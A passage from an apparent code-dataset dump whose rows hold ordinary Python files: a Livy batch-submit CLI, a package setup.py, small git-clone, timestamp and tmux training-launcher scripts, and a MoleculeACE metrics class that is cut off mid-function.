default=cfg.submit.task_fail,
help="Run plugin(s) on task is ended and ended and regardless to its state",
)
livy.cli.logging.setup_argparse(parser)
args: PreSubmitArguments = parser.parse_args(argv)
# time stamping
tzlocal = datetime.datetime.now(datetime.timezone.utc).astimezone().tzinfo
def now() -> datetime.datetime:
return datetime.datetime.now().astimezone(tzlocal)
args.time_prog_start = now()
# setup logger
livy.cli.logging.init(args)
console = livy.cli.logging.get("livy-read-log.main")
console.info("Submission task started")
# run pre-submit actions
args: TaskEndedArguments = run_hook(console, "PRE-SUBMIT", args, args.on_pre_submit)
# check server state
client = livy.LivyClient(url=args.api_url)
try:
client.check(False)
except livy.RequestError as e:
console.error("Failed to connect to server: %s", e)
return 1
# build request payload
submit_parameter = {}
for key, value in [
("file", args.script),
("class_name", args.class_name),
("args", args.args),
("jars", args.jars),
("py_files", args.py_files),
("files", args.files),
("driver_memory", args.driver_memory),
("driver_cores", args.driver_cores),
("executor_memory", args.executor_memory),
("executor_cores", args.executor_cores),
("num_executors", args.num_executors),
("archives", args.archives),
("queue", args.queue_name),
("name", args.session_name),
("conf", {k: v for k, v in args.spark_conf}),
]:
if value:
submit_parameter[key] = value
console.info(
"Creating batch with parameters: %s",
json.dumps(submit_parameter, indent=2),
)
# timing
args.time_task_submit = now()
console.debug("Batch submission time= %s", args.time_task_submit)
# submit
try:
submit_resp = client.create_batch(**submit_parameter)
except livy.RequestError as e:
console.error("Failed to connect to server: %s", e)
return 1
console.info("Server response: %s", json.dumps(submit_resp, indent=2))
args.batch_id = submit_resp.get("id", None)
if not isinstance(args.batch_id, int) or args.batch_id < 0:
console.error("Failed to get batch id. Something goes wrong.")
return 1
# watch log
if not args.watch_log:
console.info("Batch %d created.", args.batch_id)
return 0
console.info("Start reading logs of batch %d", args.batch_id)
reader = livy.LivyBatchLogReader(client, args.batch_id)
try:
reader.read_until_finish()
except livy.RequestError as e:
console.error(
"Error occurs during read log. HTTP code=%d, Reason=%s", e.code, e.reason
)
return 1
except KeyboardInterrupt:
msg_args = args.batch_id, args.api_url # just for shorten
console.warning("Keyboard interrupt. Local livy-submit process terminating.")
console.warning("Your task might be still running on the server.")
console.warning("For reading the logs, call:")
console.warning(" livy read-log %d --api-url %s", *msg_args)
console.warning("For stopping the task, call:")
console.warning(" livy kill %d --api-url %s", *msg_args)
return 1
# timing
args.time_task_ended = now()
console.debug("Batch finishing time= %s", args.time_task_ended)
# get ending state
try:
args.state = client.get_batch_state(args.batch_id)
except livy.RequestError:
console.error("Error during query batch ending state.")
return 1
if args.state == "success":
exit_code = 0
state_level = logging.INFO
else:
exit_code = 1
state_level = logging.WARNING
console.log(state_level, "Batch#%d ended with state= %s", args.batch_id, args.state)
elapsed_time = args.time_task_ended - args.time_task_submit
console.info(
"Batch execution time: %dsec (%s)",
elapsed_time.total_seconds(),
human_readable_timeperiod(elapsed_time),
)
# run task-end actions
if args.state == "success":
args = run_hook(console, "TASK-SUCCESS", args, args.on_task_success)
else:
args = run_hook(console, "TASK-FAILED", args, args.on_task_failed)
args = run_hook(console, "TASK", args, args.on_task_ended)
return exit_code
def argmem(s: str):
"""Validate input for memory size"""
if not re.fullmatch(r"\d+[gm]b?", s, re.RegexFlag.IGNORECASE):
raise argparse.ArgumentTypeError(
"please specific memory size in format '1234mb'"
)
return s
def argkvpair(val):
"""Splitting key value pair"""
k, v = val.split("=", 1)
return k, v
def run_hook(
logger: logging.Logger,
identifier: str,
args: argparse.Namespace,
actions: typing.List[str],
) -> argparse.Namespace:
"""Run hook actions"""
for action_name in actions:
logger.info("Run %s action %s", identifier.lower(), action_name)
func = get_function(action_name)
if not func:
logger.warning("Failed to get action function instance. Stop process.")
exit(1)
try:
args = func(identifier, args)
except:
logger.exception(
"Error occurs during %s action. Stop process.", identifier.lower()
)
exit(1)
if not isinstance(args, argparse.Namespace):
logger.error(
"Expect namespace object from %s's return value. Got %s",
action_name,
type(args).__name__,
)
exit(1)
return args
def get_function(name: str) -> typing.Callable:
"""Get function by module name"""
m = re.fullmatch(r"([\w.]+):(\w+)", name, re.RegexFlag.I)
if not m:
logger.error("Failed to resolve function name: %s", name)
logger.error("Please specific it in module:func format")
return
module_name, func_name = m.groups()
try:
module = importlib.import_module(module_name)
except ImportError:
logger.error("Failed to find module: %s", module_name)
return
try:
func = getattr(module, func_name)
except AttributeError:
logger.error("Failed to find function %s in %s", func_name, module_name)
return
return func
def human_readable_timeperiod(period: datetime.timedelta):
"""Convert time period to human readable format"""
total_seconds = int(period.total_seconds())
terms = []
days = total_seconds // 86400
if days:
terms.append(f"{days}d")
hours = total_seconds // 3600 % 24
if hours:
terms.append(f"{hours}h")
minutes = total_seconds // 60 % 60
if minutes:
terms.append(f"{minutes}m")
seconds = total_seconds % 60
if seconds:
terms.append(f"{seconds}s")
return " ".join(terms)
if __name__ == "__main__":
exit(main())
| """Submit a batch task to livy server."""
import argparse
import datetime
import importlib
import json
import logging
import re
import typing
import livy
import livy.cli.config
import livy.cli.logging
logger = logging.getLogger(__name__)
class PreSubmitArguments(argparse.Namespace):
"""Typed :py:class:`~argparse.Namespace` for arguments before task submission."""
# task
script: str
args: typing.List[str]
class_name: str
jars: typing.List[str]
py_files: typing.List[str]
files: typing.List[str]
archives: typing.List[str]
queue_name: str
session_name: str
api_url: str
driver_memory: str
driver_cores: int
executor_memory: str
executor_cores: int
num_executors: int
spark_conf: typing.List[typing.Tuple[str, str]]
# log
watch_log: bool
# time
time_prog_start: datetime.datetime
"Local time this script is called"
class TaskEndedArguments(PreSubmitArguments):
"""Typed :py:class:`~argparse.Namespace` for arguments when task is ended.
It contains all attributes from :py:class:`~livy.cli.submit.PreSubmitArguments`.
"""
# task
batch_id: int
"Batch ID response by livy server"
state: str
"Task ended state"
# time
time_task_submit: datetime.datetime
"Local time before task is submitted"
time_task_ended: datetime.datetime
"Local time that detected task is ended"
def main(argv=None):
"""CLI entrypoint"""
# parse argument
cfg = livy.cli.config.load()
parser = argparse.ArgumentParser(
prog="livy submit",
description=__doc__,
)
parser.add_argument(
"script",
help="Path to the script that contains the application to be executed",
)
parser.add_argument(
"args",
nargs="*",
help="Arguments for the task script",
)
parser.add_argument(
"--class-name",
metavar="COM.EXAMPLE.FOO",
help="Application Java/Spark main class (for Java/Scala task)",
)
parser.add_argument(
"--jars",
nargs="+",
metavar="FOO.JAR",
help="Java dependencies to be used in this batch",
)
parser.add_argument(
"--py-files",
nargs="+",
metavar="FOO.ZIP",
help="Python dependencies to be used in this batch",
)
parser.add_argument(
"--files",
nargs="+",
metavar="FOO.TXT",
help="Files to be used in this batch",
)
parser.add_argument(
"--archives",
nargs="+",
metavar="FOO.TAR",
help="Archives to be used in this batch",
)
parser.add_argument(
"--queue-name",
metavar="DEFAULT",
help="The name of the YARN queue to which submitted",
)
parser.add_argument(
"--session-name",
metavar="HELLO",
help="The session name to execute this batch",
)
group = parser.add_argument_group("pre-submit actions")
group.add_argument(
"--on-pre-submit",
metavar="PLUG",
nargs="+",
default=cfg.submit.pre_submit,
help="Run plugin(s) before submit",
)
group = parser.add_argument_group("livy server configuration")
group.add_argument(
"--api-url",
required=cfg.root.api_url is None,
default=cfg.root.api_url,
help="Base-URL for Livy API server",
)
group.add_argument(
"--driver-memory",
metavar="10G",
default=cfg.submit.driver_memory,
type=argmem,
help="Amount of memory to use for the driver process.",
)
group.add_argument(
"--driver-cores",
metavar="N",
default=cfg.submit.driver_cores,
type=int,
help="Number of cores to use for the driver process.",
)
group.add_argument(
"--executor-memory",
metavar="10G",
default=cfg.submit.executor_memory,
type=argmem,
help="Amount of memory to use for the executor process.",
)
group.add_argument(
"--executor-cores",
metavar="N",
default=cfg.submit.executor_cores,
type=int,
help="Number of cores to use for each executor.",
)
group.add_argument(
"--num-executors",
metavar="N",
default=cfg.submit.num_executors,
type=int,
help="Number of executors to launch for this batch.",
)
group.add_argument(
"--spark-conf",
metavar="CONF_NAME=VALUE",
nargs="+",
default=cfg.submit.spark_conf,
type=argkvpair,
help="Spark configuration properties.",
)
group = parser.add_argument_group("post-submit actions")
g = group.add_mutually_exclusive_group()
g.set_defaults(watch_log=cfg.submit.watch_log)
g.add_argument(
"--watch-log",
dest="watch_log",
action="store_true",
help="Watching for logs until it is finished",
)
g.add_argument(
"--no-watch-log",
dest="watch_log",
action="store_false",
help="Not to watch for logs. Only submit the task and quit.",
)
group = parser.add_argument_group("after-task-finish actions")
group.add_argument(
"--on-task-success",
metavar="PLUG",
nargs="+",
default=cfg.submit.task_success,
help="Run plugin(s) on task is finished and success",
)
group.add_argument(
"--on-task-failed",
metavar="PLUG",
nargs="+",
default=cfg.submit.task_fail,
help="Run plugin(s) on task is ended and failed",
)
group.add_argument(
"--on-task-ended",
metavar="PLUG",
nargs="+",
default=cfg.submit.task_fail,
help="Run plugin(s) on task is ended and ended and regardless to its state",
)
livy.cli.logging.setup_argparse(parser)
args: PreSubmitArguments = parser.parse_args(argv)
# time stamping
tzlocal = datetime.datetime.now(datetime.timezone.utc).astimezone().tzinfo
def now() -> datetime.datetime:
return datetime.datetime.now().astimezone(tzlocal)
args.time_prog_start = now()
# setup logger
livy.cli.logging.init(args)
console = livy.cli.logging.get("livy-read-log.main")
console.info("Submission task started")
# run pre-submit actions
args: TaskEndedArguments = run_hook(console, "PRE-SUBMIT", args, args.on_pre_submit)
# check server state
client = livy.LivyClient(url=args.api_url)
try:
client.check(False)
except livy.RequestError as e:
console.error("Failed to connect to server: %s", e)
return 1
# build request payload
submit_parameter = {}
for key, value in [
("file", args.script),
("class_name", args.class_name),
("args", args.args),
("jars", args.jars),
("py_files", args.py_files),
("files", args.files),
("driver_memory", args.driver_memory),
("driver_cores", args.driver_cores),
("executor_memory", args.executor_memory),
("executor_cores", args.executor_cores),
("num_executors", args.num_executors),
("archives", args.archives),
("queue", args.queue_name),
("name", args.session_name),
("conf", {k: v for k, v in args.spark_conf}),
]:
if value:
submit_parameter[key] = value
console.info(
"Creating batch with parameters: %s",
json.dumps(submit_parameter, indent=2),
)
# timing
args.time_task_submit = now()
console.debug("Batch submission time= %s", args.time_task_submit)
# submit
try:
submit_resp = client.create_batch(**submit_parameter)
except livy.RequestError as e:
console.error("Failed to connect to server: %s", e)
return 1
console.info("Server response: %s", json.dumps(submit_resp, indent=2))
args.batch_id = submit_resp.get("id", None)
if not isinstance(args.batch_id, int) or args.batch_id < 0:
console.error("Failed to get batch id. Something goes wrong.")
return 1
# watch log
if not args.watch_log:
console.info("Batch %d created.", args.batch_id)
return 0
console.info("Start reading logs of batch %d", args.batch_id)
reader = livy.LivyBatchLogReader(client, args.batch_id)
try:
reader.read_until_finish()
except livy.RequestError as e:
console.error(
"Error occurs during read log. HTTP code=%d, Reason=%s", e.code, e.reason
)
return 1
except KeyboardInterrupt:
msg_args = args.batch_id, args.api_url # just for shorten
console.warning("Keyboard interrupt. Local livy-submit process terminating.")
console.warning("Your task might be still running on the server.")
console.warning("For reading the logs, call:")
console.warning(" livy read-log %d --api-url %s", *msg_args)
console.warning("For stopping the task, call:")
console.warning(" livy kill %d --api-url %s", *msg_args)
return 1
# timing
args.time_task_ended = now()
console.debug("Batch finishing time= %s", args.time_task_ended)
# get ending state
try:
args.state = client.get_batch_state(args.batch_id)
except livy.RequestError:
console.error("Error during query batch ending state.")
return 1
if args.state == "success":
exit_code = 0
state_level = logging.INFO
else:
exit_code = 1
state_level = logging.WARNING
console.log(state_level, "Batch#%d ended with state= %s", args.batch_id, args.state)
elapsed_time = args.time_task_ended - args.time_task_submit
console.info(
"Batch execution time: %dsec (%s)",
elapsed_time.total_seconds(),
human_readable_timeperiod(elapsed_time),
)
# run task-end actions
if args.state == "success":
args = run_hook(console, "TASK-SUCCESS", args, args.on_task_success)
else:
args = run_hook(console, "TASK-FAILED", args, args.on_task_failed)
args = run_hook(console, "TASK", args, args.on_task_ended)
return exit_code
def argmem(s: str):
"""Validate input for memory size"""
if not re.fullmatch(r"\d+[gm]b?", s, re.RegexFlag.IGNORECASE):
raise argparse.ArgumentTypeError(
"please specific memory size in format '1234mb'"
)
return s
def argkvpair(val):
"""Splitting key value pair"""
k, v = val.split("=", 1)
return k, v
def run_hook(
logger: logging.Logger,
identifier: str,
args: argparse.Namespace,
actions: typing.List[str],
) -> argparse.Namespace:
"""Run hook actions"""
for action_name in actions:
logger.info("Run %s action %s", identifier.lower(), action_name)
func = get_function(action_name)
if not func:
logger.warning("Failed to get action function instance. Stop process.")
exit(1)
try:
args = func(identifier, args)
except:
logger.exception(
"Error occurs during %s action. Stop process.", identifier.lower()
)
exit(1)
if not isinstance(args, argparse.Namespace):
logger.error(
"Expect namespace object from %s's return value. Got %s",
action_name,
type(args).__name__,
)
exit(1)
return args
def get_function(name: str) -> typing.Callable:
"""Get function by module name"""
m = re.fullmatch(r"([\w.]+):(\w+)", name, re.RegexFlag.I)
if not m:
logger.error("Failed to resolve function name: %s", name)
logger.error("Please specific it in module:func format")
return
module_name, func_name = m.groups()
try:
module = importlib.import_module(module_name)
except ImportError:
logger.error("Failed to find module: %s", module_name)
return
try:
func = getattr(module, func_name)
except AttributeError:
logger.error("Failed to find function %s in %s", func_name, module_name)
return
return func
def human_readable_timeperiod(period: datetime.timedelta):
"""Convert time period to human readable format"""
total_seconds = int(period.total_seconds())
terms = []
days = total_seconds // 86400
if days:
terms.append(f"{days}d")
hours = total_seconds // 3600 % 24
if hours:
terms.append(f"{hours}h")
minutes = total_seconds // 60 % 60
if minutes:
terms.append(f"{minutes}m")
seconds = total_seconds % 60
if seconds:
terms.append(f"{seconds}s")
return " ".join(terms)
if __name__ == "__main__":
exit(main())
| pt | 0.112358 | 2.60752 | 3 |
setup.py | nickyfoto/premoji | 0 | 13517 | """Minimal setup file for learn project."""
import pathlib
from setuptools import setup, find_packages
# The directory containing this file
HERE = pathlib.Path(__file__).parent
# The text of the README file
README = (HERE / "README.md").read_text()
setup(
name = 'premoji',
version = '0.1.4',
description = 'predict emoji on given text',
long_description = README,
long_description_content_type = "text/markdown",
license = "MIT",
author = '<NAME>',
author_email = '<EMAIL>',
url = 'https://macworks.io',
download_url = 'https://github.com/nickyfoto/premoji/archive/v0.1.3-alpha.tar.gz',
packages = find_packages(where='src'),
package_dir = {'': 'src'},
include_package_data=True,
install_requires = [
'numpy',
'scikit-learn',
],
classifiers = [
'Development Status :: 3 - Alpha', # Chose either "3 - Alpha", "4 - Beta" or "5 - Production/Stable" as the current state of your package
'Intended Audience :: Developers', # Define that your audience are developers
'Topic :: Software Development :: Build Tools',
'License :: OSI Approved :: MIT License', # Again, pick a license
'Programming Language :: Python :: 3.7',
]
)
| """Minimal setup file for learn project."""
import pathlib
from setuptools import setup, find_packages
# The directory containing this file
HERE = pathlib.Path(__file__).parent
# The text of the README file
README = (HERE / "README.md").read_text()
setup(
name = 'premoji',
version = '0.1.4',
description = 'predict emoji on given text',
long_description = README,
long_description_content_type = "text/markdown",
license = "MIT",
author = '<NAME>',
author_email = '<EMAIL>',
url = 'https://macworks.io',
download_url = 'https://github.com/nickyfoto/premoji/archive/v0.1.3-alpha.tar.gz',
packages = find_packages(where='src'),
package_dir = {'': 'src'},
include_package_data=True,
install_requires = [
'numpy',
'scikit-learn',
],
classifiers = [
'Development Status :: 3 - Alpha', # Chose either "3 - Alpha", "4 - Beta" or "5 - Production/Stable" as the current state of your package
'Intended Audience :: Developers', # Define that your audience are developers
'Topic :: Software Development :: Build Tools',
'License :: OSI Approved :: MIT License', # Again, pick a license
'Programming Language :: Python :: 3.7',
]
)
| pt | 0.250915 | 1.776083 | 2 |
02-current-time.py | KeithWilliamsGMIT/Emerging-Technologies-Python-Fundamentals | 0 | 13518 | <reponame>KeithWilliamsGMIT/Emerging-Technologies-Python-Fundamentals<filename>02-current-time.py
# Author: <NAME>
# Date: 21/09/2017
from time import strftime
# This line prints the current date and time to the console in the format 01-10-2017 13:15:30.
# strftime must be imported from the time package before being used.
print(strftime("%d-%m-%Y %H:%M:%S")) | # Author: <NAME>
# Date: 21/09/2017
from time import strftime
# This line prints the current date and time to the console in the format 01-10-2017 13:15:30.
# strftime must be imported from the time package before being used.
print(strftime("%d-%m-%Y %H:%M:%S")) | pt | 0.136429 | 3.701859 | 4 |
git_management/clone.py | afsantaliestra/scripts | 0 | 13519 | <reponame>afsantaliestra/scripts<gh_stars>0
import os
filepath = 'list.txt'
with open(filepath) as fp:
while line := fp.readline():
line = line.strip()
os.system(f'git clone {line}')
| import os
filepath = 'list.txt'
with open(filepath) as fp:
while line := fp.readline():
line = line.strip()
os.system(f'git clone {line}') | none | 1 | 2.515881 | 3 |
train.py | amansoni/sequential-decision-problem-algorithms | 0 | 13520 | <reponame>amansoni/sequential-decision-problem-algorithms
import argparse
import os
import sys
parser = argparse.ArgumentParser(description="Run commands")
parser.add_argument('-w', '--num-workers', default=1, type=int,
help="Number of workers")
parser.add_argument('-r', '--remotes', default=None,
help='The address of pre-existing VNC servers and '
'rewarders to use (e.g. -r vnc://localhost:5900+15900,vnc://localhost:5901+15901).')
parser.add_argument('-e', '--env-id', type=str, default="PongDeterministic-v3",
help="Environment id")
parser.add_argument('-l', '--log-dir', type=str, default="/tmp/pong",
help="Log directory path")
def new_tmux_cmd(session, name, cmd):
if isinstance(cmd, (list, tuple)):
cmd = " ".join(str(v) for v in cmd)
return name, "tmux send-keys -t {}:{} '{}' Enter".format(session, name, cmd)
def create_tmux_commands(session, num_workers, remotes, env_id, logdir, shell='sh'):
# for launching the TF workers and for launching tensorboard
base_cmd = [
'CUDA_VISIBLE_DEVICES=', sys.executable, 'worker.py',
'--log-dir', logdir, '--env-id', env_id,
'--num-workers', str(num_workers)]
if remotes is None:
remotes = ["1"] * num_workers
else:
remotes = remotes.split(',')
assert len(remotes) == num_workers
cmds_map = [new_tmux_cmd(session, "ps", base_cmd + ["--job-name", "ps"])]
for i in range(num_workers):
cmds_map += [new_tmux_cmd(session,
"w-%d" % i, base_cmd + ["--job-name", "worker", "--task", str(i), "--remotes", remotes[i]])]
cmds_map += [new_tmux_cmd(session, "tb", ["tensorboard --logdir {} --port 12345".format(logdir)])]
cmds_map += [new_tmux_cmd(session, "htop", ["htop"])]
windows = [v[0] for v in cmds_map]
cmds = [
"mkdir -p {}".format(logdir),
"tmux kill-session -t {}".format(session),
"tmux new-session -s {} -n {} -d {}".format(session, windows[0], shell)
]
for w in windows[1:]:
cmds += ["tmux new-window -t {} -n {} {}".format(session, w, shell)]
cmds += ["sleep 1"]
for window, cmd in cmds_map:
cmds += [cmd]
return cmds
def run():
args = parser.parse_args()
cmds = create_tmux_commands("a3c", args.num_workers, args.remotes, args.env_id, args.log_dir)
print("\n".join(cmds))
os.system("\n".join(cmds))
if __name__ == "__main__":
run()
| import argparse
import os
import sys
parser = argparse.ArgumentParser(description="Run commands")
parser.add_argument('-w', '--num-workers', default=1, type=int,
help="Number of workers")
parser.add_argument('-r', '--remotes', default=None,
help='The address of pre-existing VNC servers and '
'rewarders to use (e.g. -r vnc://localhost:5900+15900,vnc://localhost:5901+15901).')
parser.add_argument('-e', '--env-id', type=str, default="PongDeterministic-v3",
help="Environment id")
parser.add_argument('-l', '--log-dir', type=str, default="/tmp/pong",
help="Log directory path")
def new_tmux_cmd(session, name, cmd):
if isinstance(cmd, (list, tuple)):
cmd = " ".join(str(v) for v in cmd)
return name, "tmux send-keys -t {}:{} '{}' Enter".format(session, name, cmd)
def create_tmux_commands(session, num_workers, remotes, env_id, logdir, shell='sh'):
# for launching the TF workers and for launching tensorboard
base_cmd = [
'CUDA_VISIBLE_DEVICES=', sys.executable, 'worker.py',
'--log-dir', logdir, '--env-id', env_id,
'--num-workers', str(num_workers)]
if remotes is None:
remotes = ["1"] * num_workers
else:
remotes = remotes.split(',')
assert len(remotes) == num_workers
cmds_map = [new_tmux_cmd(session, "ps", base_cmd + ["--job-name", "ps"])]
for i in range(num_workers):
cmds_map += [new_tmux_cmd(session,
"w-%d" % i, base_cmd + ["--job-name", "worker", "--task", str(i), "--remotes", remotes[i]])]
cmds_map += [new_tmux_cmd(session, "tb", ["tensorboard --logdir {} --port 12345".format(logdir)])]
cmds_map += [new_tmux_cmd(session, "htop", ["htop"])]
windows = [v[0] for v in cmds_map]
cmds = [
"mkdir -p {}".format(logdir),
"tmux kill-session -t {}".format(session),
"tmux new-session -s {} -n {} -d {}".format(session, windows[0], shell)
]
for w in windows[1:]:
cmds += ["tmux new-window -t {} -n {} {}".format(session, w, shell)]
cmds += ["sleep 1"]
for window, cmd in cmds_map:
cmds += [cmd]
return cmds
def run():
args = parser.parse_args()
cmds = create_tmux_commands("a3c", args.num_workers, args.remotes, args.env_id, args.log_dir)
print("\n".join(cmds))
os.system("\n".join(cmds))
if __name__ == "__main__":
run() | pt | 0.14048 | 2.441517 | 2 |
MoleculeACE/benchmark/evaluation/results.py | molML/MoleculeACE | 9 | 13521 | """
Class that holds the results: used for evaluating model performance on activity cliff compounds
<NAME>, Eindhoven University of Technology, March 2022
"""
import os
import numpy as np
from MoleculeACE.benchmark.utils.const import Algorithms
from .metrics import calc_rmse, calc_q2f3
class Results:
def __init__(self, predictions=None, reference=None, y_train=None, data=None,
tanimoto_cliff_compounds=None, scaffold_cliff_compounds=None, levenshtein_cliff_compounds=None,
soft_consensus_cliff_compounds=None):
self.predictions = predictions
self.reference = reference
self.y_train = y_train
self.tanimoto_cliff_compounds = tanimoto_cliff_compounds
self.scaffold_cliff_compounds = scaffold_cliff_compounds
self.levenshtein_cliff_compounds = levenshtein_cliff_compounds
self.soft_consensus_cliff_compounds = soft_consensus_cliff_compounds
self.data = data
self.rmse = np.inf
self.q2f3 = 0
self.tanimoto_cliff_rmse = np.inf
self.scaffold_cliff_rmse = np.inf
self.levenshtein_cliff_rmse = np.inf
self.soft_consensus_cliff_rmse = np.inf
def calc_rmse(self, reference=None, predictions=None):
""" Calculate the rmse from two lists of reference and predicted bioactivity"""
if reference is not None:
self.reference = reference
if predictions is not None:
self.predictions = predictions
# calculate the rmsd
self.rmse = calc_rmse(self.reference, self.predictions)
return self.rmse
def calc_q2f3(self, reference=None, predictions=None, y_train=None):
""" Calculates the Q2 F3 score (best according to Todeschini et al. 2016)
Args:
reference: (1d array-like shape) true test values (float)
predictions: (1d array-like shape) predicted test values (float)
y_train: (1d array-like shape) true train values (float)
Returns: Q2F3 score
"""
if reference is not None:
self.reference = reference
if predictions is not None:
self.predictions = predictions
if y_train is not None:
self.y_train = y_train
# calculate the q2f3
self.q2f3 = calc_q2f3(self.reference, self.predictions, self.y_train)
return self.q2f3
def calc_cliff_rmse(self, reference=None, predictions=None, tanimoto_cliff_compounds=None,
scaffold_cliff_compounds=None, levenshtein_cliff_compounds=None,
soft_consensus_cliff_compounds=None):
""" Calculate the rmse of only cliff compounds
Args:
levenshtein_cliff_compounds: (lst) Binary list of cliff compounds (same length as predictions)
tanimoto_cliff_compounds: (lst) Binary list of cliff compounds (same length as predictions)
scaffold_cliff_compounds: (lst) Binary list of cliff compounds (same length as predictions)
consensus_cliff_compounds: (lst) Binary list of cliff compounds (same length as predictions)
soft_consensus_cliff_compounds: (lst) Binary list of cliff compounds (same length as predictions)
reference: (lst) true bioactivity values
predictions: (lst) predicted bioactivity values
cliff_compounds: (lst) binary list describing if a compound is a cliff compound (1 == cliff, 0 == no cliff)
Returns: (float) rmse
"""
if reference is not None:
self.reference = reference
if predictions is not None:
self.predictions = predictions
if tanimoto_cliff_compounds is not None:
self.tanimoto_cliff_compounds = tanimoto_cliff_compounds
if scaffold_cliff_compounds is not None:
self.scaffold_cliff_compounds = scaffold_cliff_compounds
if levenshtein_cliff_compounds is not None:
self.levenshtein_cliff_compounds = levenshtein_cliff_compounds
if soft_consensus_cliff_compounds is not None:
self.soft_consensus_cliff_compounds = soft_consensus_cliff_compounds
if self.tanimoto_cliff_compounds is not None:
# Subset only reference and predicted values of the cliff compounds, then calculate cliff rmse
clf_ref = [self.reference[idx] for idx, clf in enumerate(self.tanimoto_cliff_compounds) if clf == 1]
clf_prd = [self.predictions[idx] for idx, clf in enumerate(self.tanimoto_cliff_compounds) if clf == 1]
self.tanimoto_cliff_rmse = calc_rmse(clf_ref, clf_prd)
if self.scaffold_cliff_compounds is not None:
# Subset only reference and predicted values of the cliff compounds, then calculate cliff rmse
clf_ref = [self.reference[idx] for idx, clf in enumerate(self.scaffold_cliff_compounds) if clf == 1]
clf_prd = [self.predictions[idx] for idx, clf in enumerate(self.scaffold_cliff_compounds) if clf == 1]
self.scaffold_cliff_rmse = calc_rmse(clf_ref, clf_prd)
if self.levenshtein_cliff_compounds is not None:
# Subset only reference and predicted values of the cliff compounds, then calculate cliff rmse
clf_ref = [self.reference[idx] for idx, clf in enumerate(self.levenshtein_cliff_compounds) if clf == 1]
clf_prd = [self.predictions[idx] for idx, clf in enumerate(self.levenshtein_cliff_compounds) if clf == 1]
self.levenshtein_cliff_rmse = calc_rmse(clf_ref, clf_prd)
if self.soft_consensus_cliff_compounds is not None:
# Subset only reference and predicted values of the cliff compounds, then calculate cliff rmse
clf_ref = [self.reference[idx] for idx, clf in enumerate(self.soft_consensus_cliff_compounds) if clf == 1]
clf_prd = [self.predictions[idx] for idx, clf in enumerate(self.soft_consensus_cliff_compounds) if clf == 1]
self.soft_consensus_cliff_rmse = calc_rmse(clf_ref, clf_prd)
return {'tanimoto_cliff_rmse': self.tanimoto_cliff_rmse, 'scaffold_cliff_rmse': self.scaffold_cliff_rmse,
'levenshtein_cliff_rmse': self.levenshtein_cliff_rmse,
'soft_consensus_cliff_rmse': self.soft_consensus_cliff_rmse}
def to_csv(self, filename, algorithm: Algorithms = None):
    """Append a one-line summary of this result to a CSV file.

    Writes a header row first when *filename* does not exist yet. Requires
    ``self.data`` to be populated (it supplies the dataset name, descriptor,
    augmentation flag, and cliff statistics); otherwise this is a no-op.

    Parameters
    ----------
    filename:
        path of the CSV file to create/append to.
    algorithm: Algorithms, optional
        enum member whose ``value`` is recorded in the `algorithm` column.
    """
    # Create output file if it doesn't exist
    if self.data is not None:
        if not os.path.isfile(filename):
            with open(filename, 'w') as f:
                f.write('dataset,'
                        'algorithm,'
                        'descriptor,'
                        'augmentation,'
                        'rmse,'
                        'cliff_rmse,'
                        'n_compounds,'
                        'n_cliff_compounds,'
                        'n_compounds_train,'
                        'n_cliff_compounds_train,'
                        'n_compounds_test,'
                        'n_cliff_compounds_test\n')
        # Append one data row; the cliff columns use the soft-consensus stats.
        with open(filename, 'a') as f:
            f.write(f'{self.data.name},'
                    f'{algorithm.value},'
                    f'{self.data.descriptor.value},'
                    f'{self.data.augmentation},'
                    f'{self.rmse},'
                    f'{self.soft_consensus_cliff_rmse},'
                    f'{self.data.cliffs.stats["n_compounds"]},'
                    f'{self.data.cliffs.stats["n_soft_consensus_cliff_compounds"]},'
                    f'{self.data.cliffs.stats["n_compounds_train"]},'
                    f'{self.data.cliffs.stats["n_soft_consensus_cliff_compounds_train"]},'
                    f'{self.data.cliffs.stats["n_compounds_test"]},'
                    f'{self.data.cliffs.stats["n_soft_consensus_cliff_compounds_test"]}\n')
def __repr__(self):
    """Multi-line summary of the headline metrics (RMSE, Q2F3, cliff RMSE)."""
    return f"RMSE: {self.rmse:.4f}\n" \
           f"Q2F3: {self.q2f3:.4f}\n" \
           f"AC-RMSE: {self.soft_consensus_cliff_rmse:.4f}\n"
| """
Class that holds the results: used for evaluating model performance on activity cliff compounds
<NAME>, Eindhoven University of Technology, March 2022
"""
import os
import numpy as np
from MoleculeACE.benchmark.utils.const import Algorithms
from .metrics import calc_rmse, calc_q2f3
class Results:
    """Container for regression predictions and activity-cliff metrics.

    Stores reference / predicted bioactivity values together with optional
    binary masks flagging activity-cliff compounds (tanimoto, scaffold,
    levenshtein, or soft-consensus based) and provides RMSE, Q2F3, and
    cliff-subset RMSE calculations plus CSV export.
    """

    def __init__(self, predictions=None, reference=None, y_train=None, data=None,
                 tanimoto_cliff_compounds=None, scaffold_cliff_compounds=None,
                 levenshtein_cliff_compounds=None, soft_consensus_cliff_compounds=None):
        self.predictions = predictions    # predicted test bioactivity values
        self.reference = reference        # true test bioactivity values
        self.y_train = y_train            # true train values (needed for Q2F3)
        # Binary masks (1 == cliff compound), aligned with `predictions`.
        self.tanimoto_cliff_compounds = tanimoto_cliff_compounds
        self.scaffold_cliff_compounds = scaffold_cliff_compounds
        self.levenshtein_cliff_compounds = levenshtein_cliff_compounds
        self.soft_consensus_cliff_compounds = soft_consensus_cliff_compounds
        self.data = data                  # dataset object; supplies to_csv columns
        # Metric slots, initialized to worst-case values until computed.
        self.rmse = np.inf
        self.q2f3 = 0
        self.tanimoto_cliff_rmse = np.inf
        self.scaffold_cliff_rmse = np.inf
        self.levenshtein_cliff_rmse = np.inf
        self.soft_consensus_cliff_rmse = np.inf

    def calc_rmse(self, reference=None, predictions=None):
        """ Calculate the rmse from two lists of reference and predicted bioactivity"""
        if reference is not None:
            self.reference = reference
        if predictions is not None:
            self.predictions = predictions
        # calculate the rmsd
        self.rmse = calc_rmse(self.reference, self.predictions)
        return self.rmse

    def calc_q2f3(self, reference=None, predictions=None, y_train=None):
        """ Calculates the Q2 F3 score (best according to Todeschini et al. 2016)

        Args:
            reference: (1d array-like shape) true test values (float)
            predictions: (1d array-like shape) predicted test values (float)
            y_train: (1d array-like shape) true train values (float)

        Returns: Q2F3 score
        """
        if reference is not None:
            self.reference = reference
        if predictions is not None:
            self.predictions = predictions
        if y_train is not None:
            self.y_train = y_train
        # calculate the q2f3
        self.q2f3 = calc_q2f3(self.reference, self.predictions, self.y_train)
        return self.q2f3

    @staticmethod
    def _cliff_subset_rmse(reference, predictions, cliff_mask):
        """RMSE restricted to entries whose binary cliff-mask value equals 1."""
        subset_ref = [ref for ref, flag in zip(reference, cliff_mask) if flag == 1]
